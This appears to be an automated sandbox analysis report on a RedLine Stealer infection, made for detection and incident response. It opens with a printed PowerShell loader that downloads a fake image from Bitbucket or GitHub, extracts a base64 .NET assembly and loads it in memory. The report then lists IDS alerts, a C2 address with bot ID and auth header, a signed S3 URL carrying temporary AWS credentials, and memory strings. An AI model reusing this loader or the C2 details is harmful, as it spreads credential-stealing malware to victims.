"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method

                  Timestamp                        SID      Severity  Classtype                      Source IP        Source Port  Destination IP   Destination Port  Protocol
                  2024-09-26T12:16:25.187281+0200  2049038  1         A Network Trojan was detected  185.199.109.133  443          192.168.2.4      49730             TCP
                  2024-09-26T12:16:34.112551+0200  2043234  1         A Network Trojan was detected  185.196.9.26     6302         192.168.2.4      49739             TCP
                  2024-09-26T12:16:33.921234+0200  2043231  1         A Network Trojan was detected  192.168.2.4      49739        185.196.9.26     6302              TCP
                  2024-09-26T12:16:39.174086+0200  2043231  1         A Network Trojan was detected  192.168.2.4      49739        185.196.9.26     6302              TCP
                  2024-09-26T12:16:41.485595+0200  2043231  1         A Network Trojan was detected  192.168.2.4      49739        185.196.9.26     6302              TCP
                  2024-09-26T12:16:41.769349+0200  2043231  1         A Network Trojan was detected  192.168.2.4      49739        185.196.9.26     6302              TCP
                  2024-09-26T12:16:41.155211+0200  2046056  1         A Network Trojan was detected  185.196.9.26     6302         192.168.2.4      49739             TCP
                  2024-09-26T12:16:33.921234+0200  2046045  1         A Network Trojan was detected  192.168.2.4      49739        185.196.9.26     6302              TCP

                  AV Detection

                  Source: 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: RedLine {"C2 url": "185.196.9.26:6302", "Bot Id": "@dxrkl0rd", "Authorization Header": "9c8dd7353be7ed4b6832da21d8d0d902"}
                  Source: sRMytgfRpJ.exe, ReversingLabs: Detection: 13%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe, Code function: 0_2_00007FF7D6FD30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7D6FD30EC
                  Source: unknown, HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49735 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 52.216.210.153:443 -> 192.168.2.4:49738 version: TLS 1.2
                  Source: sRMytgfRpJ.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: wextract.pdb source: sRMytgfRpJ.exe
                  Source: Binary string: wextract.pdbGCTL source: sRMytgfRpJ.exe
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe, Code function: 0_2_00007FF7D6FD204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7D6FD204C

                  Software Vulnerabilities

                  Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                  Networking

                  Source: Network traffic, Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.4:49739 -> 185.196.9.26:6302
                  Source: Network traffic, Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.4:49739 -> 185.196.9.26:6302
                  Source: Network traffic, Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.196.9.26:6302 -> 192.168.2.4:49739
                  Source: Network traffic, Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.196.9.26:6302 -> 192.168.2.4:49739
                  Source: Network traffic, Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.109.133:443 -> 192.168.2.4:49730
                  Source: Malware configuration extractor, URLs: 185.196.9.26:6302
                  Source: global traffic, TCP traffic: 192.168.2.4:49739 -> 185.196.9.26:6302
                  Source: global traffic, HTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1, Host: raw.githubusercontent.com, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /rulmerurk/ertertqw/downloads/wil25.txt HTTP/1.1, Host: bitbucket.org, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-48dc-a094-a07a1a72e489/wil25.txt?response-content-disposition=attachment%3B%20filename%3D%22wil25.txt%22&AWSAccessKeyId=ASIA6KOSE3BNGBW4LR47&Signature=KU8K0r0pC6kOvO63BVrMZTsC7%2Bw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEMv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIEqHJaRaTsxa7hS3N4x%2FGkHhGylNp1c%2FtHaWMABp9OaTAiEAhGKa%2BaXigWinXz7qx94%2Fdz1%2BZMoaCfODDHmLNQDVpvkqpwIIExAAGgw5ODQ1MjUxMDExNDYiDE1tfzVE8xRz0o13lSqEAth9VZq4M2uouzPRXiooZ53Q4ud5xBWosJAASuO68%2Fm%2FGilxvA4dR4Hmbd9UKw1fhIOtP4fU%2BhYjpcaxW9LNtB3Tb2ZIoeIb5mSa9heTCdCH6DSktw8mBCNyPrKV88ub4XMn3grcr3V1Iqr6pH2LaAluKBUXBJSawdUMbVZqCsIwUANJ8QZfbqXe0w4%2Bx5t6Klwf6lhjxtlGxTGcNuvsngpxL3hx%2BL3kiaRNHTzbnvVr64K8%2BHAj5xyWSg2mIoh57aTjqF%2FdwefSdFVaRkDTWPsqY%2BsSkQ7CbEPDxB9aOtfvRGFWxQCean6kswq3hSbkmi0PhRIYO3UnA%2BXcKyzrCVj%2F0e3ZMK7n1LcGOp0BPNfkGu6KRQ6EXUETRUB9lmhUQOhv2S1UHbu14WIgdFZyUsk7zUgHafEANntC3hvdiPmgzCpab%2BnKFem5ZNvYAL3Ia9bDC90M2lOAmp7MDitjsvOKoKbCZYTOy3DolPfQ0bBGLHd6yaQTd5gEe7F1Z9x%2BV87sTjtC%2FYDH4I1wpK0l33W7F0Kch8ls%2FTbVXVMCh%2Fn1kFyEJlwfqO%2FsDQ%3D%3D&Expires=1727347382 HTTP/1.1, Host: bbuseruploads.s3.amazonaws.com, Connection: Keep-Alive
                  Source: Joe Sandbox View, IP Address: 185.196.9.26 185.196.9.26
                  Source: Joe Sandbox View, IP Address: 185.199.109.133 185.199.109.133
                  Source: Joe Sandbox View, IP Address: 185.166.143.49 185.166.143.49
                  Source: Joe Sandbox View, ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH
                  Source: Joe Sandbox View, ASN Name: FASTLYUS FASTLYUS
                  Source: Joe Sandbox View, ASN Name: AMAZON-02US AMAZON-02US
                  Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic, HTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1, Host: raw.githubusercontent.com, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /rulmerurk/ertertqw/downloads/wil25.txt HTTP/1.1, Host: bitbucket.org, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-48dc-a094-a07a1a72e489/wil25.txt?response-content-disposition=attachment%3B%20filename%3D%22wil25.txt%22&AWSAccessKeyId=ASIA6KOSE3BNGBW4LR47&Signature=KU8K0r0pC6kOvO63BVrMZTsC7%2Bw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEMv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIEqHJaRaTsxa7hS3N4x%2FGkHhGylNp1c%2FtHaWMABp9OaTAiEAhGKa%2BaXigWinXz7qx94%2Fdz1%2BZMoaCfODDHmLNQDVpvkqpwIIExAAGgw5ODQ1MjUxMDExNDYiDE1tfzVE8xRz0o13lSqEAth9VZq4M2uouzPRXiooZ53Q4ud5xBWosJAASuO68%2Fm%2FGilxvA4dR4Hmbd9UKw1fhIOtP4fU%2BhYjpcaxW9LNtB3Tb2ZIoeIb5mSa9heTCdCH6DSktw8mBCNyPrKV88ub4XMn3grcr3V1Iqr6pH2LaAluKBUXBJSawdUMbVZqCsIwUANJ8QZfbqXe0w4%2Bx5t6Klwf6lhjxtlGxTGcNuvsngpxL3hx%2BL3kiaRNHTzbnvVr64K8%2BHAj5xyWSg2mIoh57aTjqF%2FdwefSdFVaRkDTWPsqY%2BsSkQ7CbEPDxB9aOtfvRGFWxQCean6kswq3hSbkmi0PhRIYO3UnA%2BXcKyzrCVj%2F0e3ZMK7n1LcGOp0BPNfkGu6KRQ6EXUETRUB9lmhUQOhv2S1UHbu14WIgdFZyUsk7zUgHafEANntC3hvdiPmgzCpab%2BnKFem5ZNvYAL3Ia9bDC90M2lOAmp7MDitjsvOKoKbCZYTOy3DolPfQ0bBGLHd6yaQTd5gEe7F1Z9x%2BV87sTjtC%2FYDH4I1wpK0l33W7F0Kch8ls%2FTbVXVMCh%2Fn1kFyEJlwfqO%2FsDQ%3D%3D&Expires=1727347382 HTTP/1.1, Host: bbuseruploads.s3.amazonaws.com, Connection: Keep-Alive
                  Source: global traffic, DNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global traffic, DNS traffic detected: DNS query: bitbucket.org
                  Source: global traffic, DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169AE3C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://go.micros
                  Source: powershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
